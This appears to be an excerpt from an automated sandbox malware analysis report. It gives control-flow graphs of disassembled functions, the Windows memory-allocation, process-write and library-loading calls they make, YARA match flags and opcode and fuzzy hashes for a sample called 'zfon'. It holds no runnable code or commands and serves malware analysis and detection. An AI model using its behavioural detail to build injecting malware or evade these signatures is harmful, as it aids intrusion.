26adfd96650 451->459 476 26adfd64eb0-26adfd64eba 452->476 477 26adfd64e7b-26adfd64e89 call 26adfd66520 452->477 459->458 476->451 476->452 480 26adfd64e8b-26adfd64ea7 call 26adfd56a60 call 26adfd96b40 477->480 481 26adfd64ea8-26adfd64eab call 26adfd8def0 477->481 480->481 481->476
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocMemoryProcessVirtualWrite_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2518834501-0
                                                                                                                                                                            • Opcode ID: 3929f3d7caecdf5a166518e108926a526826c599736ea3d0cce582099cd9f6e0
                                                                                                                                                                            • Instruction ID: d999fcaabc12cf896c2a96e18ca2a942f3e78959804f5a94b16d4fa95a621ff3
                                                                                                                                                                            • Opcode Fuzzy Hash: 3929f3d7caecdf5a166518e108926a526826c599736ea3d0cce582099cd9f6e0
                                                                                                                                                                            • Instruction Fuzzy Hash: 11229430514A4C4FEB95EF28C8997EAB7E1FF69304F40461AE48ED7692DF719980CB42

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InformationProcessQuery__std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2261429478-0
                                                                                                                                                                            • Opcode ID: c26532dd56cd671d0a1b3ad32ebf9ddf33ffb71fd6066d7300b13c4462bb992f
                                                                                                                                                                            • Instruction ID: 9944dab390bd4176c14f04a29874e89e7822f54385933d55ce5acdb644a6b9c9
                                                                                                                                                                            • Opcode Fuzzy Hash: c26532dd56cd671d0a1b3ad32ebf9ddf33ffb71fd6066d7300b13c4462bb992f
                                                                                                                                                                            • Instruction Fuzzy Hash: 9751C830618F084FD758EB2CC48DBABB7D1F799315F10461EE48AD3695DE32A8858B83

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 539 7ff79d0e82c7-7ff79d0e831f call 7ff79d0e9d6f * 3 546 7ff79d0e8351 539->546 547 7ff79d0e8321-7ff79d0e8324 539->547 548 7ff79d0e8354-7ff79d0e836f 546->548 547->546 549 7ff79d0e8326-7ff79d0e8329 547->549 549->546 550 7ff79d0e832b-7ff79d0e8342 VirtualAlloc 549->550 551 7ff79d0e8344-7ff79d0e834b 550->551 552 7ff79d0e8370-7ff79d0e8399 call 7ff79d0ea2ef call 7ff79d0ea30f 550->552 551->546 553 7ff79d0e834d 551->553 558 7ff79d0e83d5-7ff79d0e83eb call 7ff79d0e9d6f 552->558 559 7ff79d0e839b-7ff79d0e83cf call 7ff79d0e9f23 call 7ff79d0e9de3 552->559 553->546 558->546 564 7ff79d0e83f1 558->564 559->558 570 7ff79d0e862a 559->570 566 7ff79d0e83f8-7ff79d0e83fe 564->566 568 7ff79d0e8400 566->568 569 7ff79d0e843b-7ff79d0e8446 566->569 572 7ff79d0e8402-7ff79d0e8404 568->572 573 7ff79d0e847b-7ff79d0e8484 569->573 574 7ff79d0e8448-7ff79d0e8462 call 7ff79d0e9d6f 569->574 571 7ff79d0e8630-7ff79d0e8641 570->571 577 7ff79d0e8643-7ff79d0e864d 571->577 578 7ff79d0e8674-7ff79d0e8695 call 7ff79d0ea30f 571->578 579 7ff79d0e8406-7ff79d0e840c 572->579 580 7ff79d0e841d-7ff79d0e841f 572->580 575 7ff79d0e84a5-7ff79d0e84ae 573->575 576 7ff79d0e8486-7ff79d0e8496 call 7ff79d0e73eb 573->576 589 7ff79d0e8464-7ff79d0e846b 574->589 590 7ff79d0e8471-7ff79d0e8479 574->590 575->571 585 7ff79d0e84b4-7ff79d0e84be 575->585 576->571 597 7ff79d0e849c-7ff79d0e84a3 576->597 577->578 583 7ff79d0e864f-7ff79d0e866c call 7ff79d0ea30f 577->583 611 7ff79d0e869b-7ff79d0e869d 578->611 612 7ff79d0e8697 578->612 579->580 584 7ff79d0e840e-7ff79d0e841b 579->584 580->569 586 7ff79d0e8421-7ff79d0e8439 call 7ff79d0e9adf 580->586 583->578 584->572 584->580 593 7ff79d0e84c0 585->593 594 7ff79d0e84c8-7ff79d0e84cf 585->594 586->566 589->570 589->590 590->573 590->574 593->594 599 7ff79d0e8503-7ff79d0e8507 594->599 600 7ff79d0e84d1-7ff79d0e84db call 7ff79d0e722f 594->600 597->594 602 7ff79d0e850d-7ff79d0e8536 VirtualAlloc 599->602 603 7ff79d0e85ba-7ff79d0e85c2 599->603 616 7ff79d0e84dd-7ff79d0e84e4 600->616 617 7ff79d0e84ea-7ff79d0e84f4 call 7ff79d0e735b 600->617 602->571 608 7ff79d0e853c-7ff79d0e8556 call 7ff79d0ea2ef 602->608 606 7ff79d0e8614-7ff79d0e861a call 7ff79d0e8ad3 603->606 607 7ff79d0e85c4-7ff79d0e85ca 603->607 620 7ff79d0e861f-7ff79d0e8626 606->620 613 7ff79d0e85e1-7ff79d0e85f3 call 7ff79d0e8053 607->613 614 7ff79d0e85cc-7ff79d0e85d2 607->614 628 7ff79d0e8572-7ff79d0e85b5 608->628 629 7ff79d0e8558-7ff79d0e855b 608->629 611->548 612->611 632 7ff79d0e8605-7ff79d0e8612 call 7ff79d0e7ae3 613->632 633 7ff79d0e85f5-7ff79d0e8600 call 7ff79d0e86a3 613->633 614->620 621 7ff79d0e85d4-7ff79d0e85df call 7ff79d0e9587 614->621 616->571 616->617 617->599 630 7ff79d0e84f6-7ff79d0e84fd 617->630 620->571 625 7ff79d0e8628 620->625 621->620 625->625 628->571 641 7ff79d0e85b7 628->641 629->603 634 7ff79d0e855d-7ff79d0e8570 call 7ff79d0ea073 629->634 630->571 630->599 632->620 633->632 634->641 641->603
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                            • Opcode ID: 5d17924f1650dce35aa6cfa67234e302229330514130ed1fd0e34ce5b20ef98f
                                                                                                                                                                            • Instruction ID: 0837bfa1abdc9c7beca5119ec87565f4375ab1a2a0bd3d60d65a2d9a052e5785
                                                                                                                                                                            • Opcode Fuzzy Hash: 5d17924f1650dce35aa6cfa67234e302229330514130ed1fd0e34ce5b20ef98f
                                                                                                                                                                            • Instruction Fuzzy Hash: 4FB1C322B0D54682EA78EF3AA5412BDA391FB8CB84FC44136DA8D57685EF3CE451C770

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 183 26adfd51835-26adfd5184f CloseHandle 184 26adfd51851-26adfd51855 183->184 185 26adfd5185a-26adfd518c5 call 26adfd524c0 call 26adfd521e0 183->185 184->185 190 26adfd518c7-26adfd518ca 185->190 191 26adfd51932-26adfd5193a 185->191 192 26adfd518cc-26adfd518e1 190->192 193 26adfd51904-26adfd5192f 190->193 194 26adfd5196e-26adfd51987 call 26adfd51d30 191->194 195 26adfd5193c-26adfd5194e 191->195 197 26adfd518fc-26adfd518ff call 26adfd8beec 192->197 198 26adfd518e3-26adfd518f6 192->198 193->191 206 26adfd5198c-26adfd51994 194->206 207 26adfd51989-26adfd5198a 194->207 199 26adfd51950-26adfd51963 195->199 200 26adfd51969 call 26adfd8beec 195->200 197->193 198->197 202 26adfd51bc6-26adfd51bcb call 26adfdacb34 198->202 199->200 199->202 200->194 211 26adfd51bcc-26adfd51bd1 call 26adfdacb34 202->211 209 26adfd51996-26adfd51997 206->209 210 26adfd51999-26adfd519a1 206->210 207->206 209->210 212 26adfd519a3-26adfd519a6 210->212 213 26adfd519c2 210->213 224 26adfd51bd2-26adfd51bd7 call 26adfdacb34 211->224 215 26adfd519be-26adfd519c0 212->215 216 26adfd519a8-26adfd519ae 212->216 217 26adfd519c4-26adfd519d0 213->217 215->217 216->213 219 26adfd519b0-26adfd519bc 216->219 220 26adfd51a0c-26adfd51a0e 217->220 221 26adfd519d2-26adfd519ec 217->221 219->215 219->216 222 26adfd51a10-26adfd51b9e 220->222 223 26adfd51a22-26adfd51a37 220->223 225 26adfd519ee-26adfd51a01 221->225 226 26adfd51a07 call 26adfd8beec 221->226 229 26adfd51a39-26adfd51a4c 223->229 230 26adfd51a52-26adfd51a79 call 26adfd8beec 223->230 235 26adfd51bd8-26adfd51bdd call 26adfdacb34 224->235 225->211 225->226 226->220 229->224 229->230 236 26adfd51a7b-26adfd51a90 230->236 237 26adfd51ac4-26adfd51acc 230->237 247 26adfd51bde-26adfd51c1d call 26adfdacb34 call 26adfd51580 call 26adfda0a14 235->247 239 26adfd51aab-26adfd51abd call 26adfd8beec 236->239 240 26adfd51a92-26adfd51aa5 236->240 242 26adfd51ace-26adfd51ae0 237->242 243 26adfd51b03-26adfd51b22 237->243 239->237 240->235 240->239 248 26adfd51afe call 26adfd8beec 242->248 249 26adfd51ae2-26adfd51af5 242->249 244 26adfd51b4e-26adfd51bc5 call 26adfd8be90 243->244 245 26adfd51b24-26adfd51b2f 243->245 245->244 252 26adfd51b31-26adfd51b43 245->252 266 26adfd51c1f-26adfd51c33 247->266 267 26adfd51c55-26adfd51c5a 247->267 248->243 249->247 250 26adfd51afb-26adfd51afc 249->250 250->248 252->244 261 26adfd51b45-26adfd51b49 252->261 261->244 268 26adfd51c50-26adfd51c51 266->268 269 26adfd51c35-26adfd51c45 266->269 268->267 269->268 271 26adfd51c47-26adfd51c4b 269->271 271->268
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$CloseHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4069755476-0
                                                                                                                                                                            • Opcode ID: 52794ae43ef133f375a4d7fa53b1f961356637d67dbba59633ce44484efc1cfd
                                                                                                                                                                            • Instruction ID: 0023ce7f970144329f2996934de4029ef225e1cc19d070912a40a6463aa6a0c7
                                                                                                                                                                            • Opcode Fuzzy Hash: 52794ae43ef133f375a4d7fa53b1f961356637d67dbba59633ce44484efc1cfd
                                                                                                                                                                            • Instruction Fuzzy Hash: 7BC1CA30218E194FDFA4EF28C488BAA73D1FB99314F544A09D09ED7795DA36D885CF82

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 487 7ff79d0e9adf-7ff79d0e9afb 488 7ff79d0e9b16-7ff79d0e9b25 487->488 489 7ff79d0e9afd-7ff79d0e9b01 487->489 491 7ff79d0e9b51-7ff79d0e9b62 488->491 492 7ff79d0e9b27-7ff79d0e9b4c 488->492 489->488 490 7ff79d0e9b03-7ff79d0e9b14 489->490 490->488 490->489 493 7ff79d0e9b66-7ff79d0e9b6d 491->493 492->491 494 7ff79d0e9b6f-7ff79d0e9b7e 493->494 495 7ff79d0e9ba8-7ff79d0e9bad LoadLibraryA 493->495 496 7ff79d0e9b80-7ff79d0e9b99 call 7ff79d0ea34b 494->496 497 7ff79d0e9b9b-7ff79d0e9ba1 494->497 498 7ff79d0e9bb0-7ff79d0e9bbf 495->498 496->497 502 7ff79d0e9bc0-7ff79d0e9bc3 496->502 497->493 500 7ff79d0e9ba3-7ff79d0e9ba6 497->500 500->495 500->498 502->498
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                                            • String ID: l
                                                                                                                                                                            • API String ID: 1029625771-2517025534
                                                                                                                                                                            • Opcode ID: 1d083b3de9a9ed48a996e456de89af2bb64d5134e63aa677a92d7ef34e970a50
                                                                                                                                                                            • Instruction ID: 4ef9bb72b0f39521117f40982cf68f02cae3ea6e341a479ce59582e2b9727308
                                                                                                                                                                            • Opcode Fuzzy Hash: 1d083b3de9a9ed48a996e456de89af2bb64d5134e63aa677a92d7ef34e970a50
                                                                                                                                                                            • Instruction Fuzzy Hash: 0921CE62A1C68986EB619F39E14432DAB90FB59BC8F581375CECE07B99DB2CD0158720

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DuplicateHandleInformationProcessQuery
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1431398230-0
                                                                                                                                                                            • Opcode ID: 8892a3de4c354403ffd96d30362b0f6fa85d71dbda6d833dead5add144ef140a
                                                                                                                                                                            • Instruction ID: 438305854b6cc5ca0d7023aa06f39f45d89e594c059b86e13cdd681351de4b51
                                                                                                                                                                            • Opcode Fuzzy Hash: 8892a3de4c354403ffd96d30362b0f6fa85d71dbda6d833dead5add144ef140a
                                                                                                                                                                            • Instruction Fuzzy Hash: CF51967191CB488FDB58EF1CD8856AAB7E0FBA9310F104A5EF489D7255DB709884CF82

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                                                            • Opcode ID: fd99b70dfc6966dce4256ea9522189a526efb06900cfd91d0ed215b37b37ac08
                                                                                                                                                                            • Instruction ID: cfbdff966ce6344b46a9d0003b0cd4a671d6ed70faf2221775a8649264632ab5
                                                                                                                                                                            • Opcode Fuzzy Hash: fd99b70dfc6966dce4256ea9522189a526efb06900cfd91d0ed215b37b37ac08
                                                                                                                                                                            • Instruction Fuzzy Hash: EC014C30618E0C4FE794DF1CE4497A9B6E0FBAC314F6042AEA44DD7276DB749985CB81

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                            • Opcode ID: e2d03e14ecea67ae3140c875a343d63f63740cbf0b01b1a0b106d18d7c617194
                                                                                                                                                                            • Instruction ID: 1f89da8b43bff22f4f7a040e385b6fe4cf0ba90d61dd362b39ac11b9c930e1a5
                                                                                                                                                                            • Opcode Fuzzy Hash: e2d03e14ecea67ae3140c875a343d63f63740cbf0b01b1a0b106d18d7c617194
                                                                                                                                                                            • Instruction Fuzzy Hash: C8F0F631614A484BE709EB34DC9D7F773D1FB94301F50493AB483D22A2EE79DA45CA82

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 680 26adfd97be0-26adfd97bf4 682 26adfd97bf6-26adfd97bfe 680->682 683 26adfd97bff-26adfd97c31 call 26adfd911b0 TlsFree 680->683
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Free
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3978063606-0
                                                                                                                                                                            • Opcode ID: d64f5b2062c7967b43152f63818274d0a04062ae98c3a6f56fe57c2b33e813dc
                                                                                                                                                                            • Instruction ID: 05be46a9d592e4c4f4600ddeda9ac11ee2302582fdd4d468a8fd29fa2f765b96
                                                                                                                                                                            • Opcode Fuzzy Hash: d64f5b2062c7967b43152f63818274d0a04062ae98c3a6f56fe57c2b33e813dc
                                                                                                                                                                            • Instruction Fuzzy Hash: D5F0E5342008088BE71CBBF6FDC966033E4E749315F500B29E52BD75E1EB3A5849CB42

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 686 26adfdbe518-26adfdbe51b 687 26adfdbe553 686->687 688 26adfdbe51d-26adfdbe536 RtlFreeHeap 686->688 689 26adfdbe538-26adfdbe547 call 26adfdb06d8 call 26adfdb07ac 688->689 690 26adfdbe54e-26adfdbe552 688->690 689->690 690->687
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                                            • Opcode ID: 8f455e8927717cf74da2ea1d6b0ff16729446bc41146d6effb8fe588f7080467
                                                                                                                                                                            • Instruction ID: e347669bff6a9f3c4365374a776212ce661655446fb9d88fa05603d4aa11c350
                                                                                                                                                                            • Opcode Fuzzy Hash: 8f455e8927717cf74da2ea1d6b0ff16729446bc41146d6effb8fe588f7080467
                                                                                                                                                                            • Instruction Fuzzy Hash: 6DE0C2307029060BFF1C6FBA5C9D37B32E69B4420AF048024B441E75A5EE2AC9408A83

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 695 26adfd646b0-26adfd646ce 696 26adfd646d0-26adfd646da 695->696 697 26adfd646f9-26adfd64700 695->697 696->697 700 26adfd646dc-26adfd646ee CloseHandle 696->700 698 26adfd64729-26adfd64738 697->698 699 26adfd64702-26adfd6470c 697->699 699->698 701 26adfd6470e-26adfd6471e 699->701 700->697 702 26adfd646f0-26adfd646f4 700->702 701->698 704 26adfd64720-26adfd64724 701->704 702->697 704->698
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                            • Opcode ID: 86e0eb6f4946c0b3aae63fa0a3b42eecc3b4de38385dd7f2f15c74cfef035e0a
                                                                                                                                                                            • Instruction ID: 0e3e5fc01fc4fd517c459167830ffef1ffe8291cc13fb64339e09b844fb918bc
                                                                                                                                                                            • Opcode Fuzzy Hash: 86e0eb6f4946c0b3aae63fa0a3b42eecc3b4de38385dd7f2f15c74cfef035e0a
                                                                                                                                                                            • Instruction Fuzzy Hash: 03111C30604A18CFDFD0EF5DC8C8B1677E1FB6A325B084569E45ACB255C625DC458F81
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear$cef_string_utf16_set$cef_string_map_keycef_string_map_sizecef_string_map_value
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2359302636-0
                                                                                                                                                                            • Opcode ID: 40aab9b283d81b728321b2f5bceb50f5e76cd29fdfed7ed626e67010ed6f3b9c
                                                                                                                                                                            • Instruction ID: aa1ce57026e37f3e6e816d4452fd157d9a82dd46d3f2d459665e07dc5132612e
                                                                                                                                                                            • Opcode Fuzzy Hash: 40aab9b283d81b728321b2f5bceb50f5e76cd29fdfed7ed626e67010ed6f3b9c
                                                                                                                                                                            • Instruction Fuzzy Hash: F581A136A09B8286EB65EF35A4043AAB7B6FB45B84F858034DE8D07758EF3CD445C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear$cef_get_min_log_level
                                                                                                                                                                            • String ID: browser=$ frame=$ request=$ response.status=$ response.statusText=$?$[OnResourceResponse]$c:\projects\hydra\main\code\contrib\contrib\scene\src\source\cef\client_handler_impl.cpp
                                                                                                                                                                            • API String ID: 2038196646-1385742800
                                                                                                                                                                            • Opcode ID: 53f7230bd971caf00079091c7a204c7fedf6cfb11e5048e3a44c5828b7dca608
                                                                                                                                                                            • Instruction ID: bbdb8efaad4963a9a3c197c13e13d5bf330871f054e45e9d85b707e98ca3951a
                                                                                                                                                                            • Opcode Fuzzy Hash: 53f7230bd971caf00079091c7a204c7fedf6cfb11e5048e3a44c5828b7dca608
                                                                                                                                                                            • Instruction Fuzzy Hash: DAE17172A0CA8685EF24EB75E4543A9A772FF84B94F844535DA8D07BA9DF3CD484C320
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
